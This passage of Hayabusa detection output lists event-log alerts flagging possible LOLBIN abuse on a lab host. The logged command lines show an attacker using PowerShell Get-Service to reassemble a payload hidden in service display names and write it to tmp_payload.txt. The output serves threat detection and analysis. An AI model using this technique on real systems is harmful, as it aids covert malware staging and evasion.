+09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:26.056 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:26.072 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:27.510 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:27.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:28.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:28.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:30.412 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:30.412 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:31.851 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:31.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:33.302 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:33.318 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:34.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:34.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb38 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:36.225 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:36.225 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:37.694 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:37.694 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfdc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:39.178 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:39.178 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:40.633 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:40.633 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:42.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:42.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:43.595 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:43.610 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:45.043 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:45.043 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:46.509 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:46.509 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:48.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:48.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:49.478 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:49.493 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:50.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:50.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:52.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:52.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:53.856 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:53.872 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:55.310 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:55.310 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:56.748 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:56.764 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:58.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xec8 | User: FS03$ | LID: 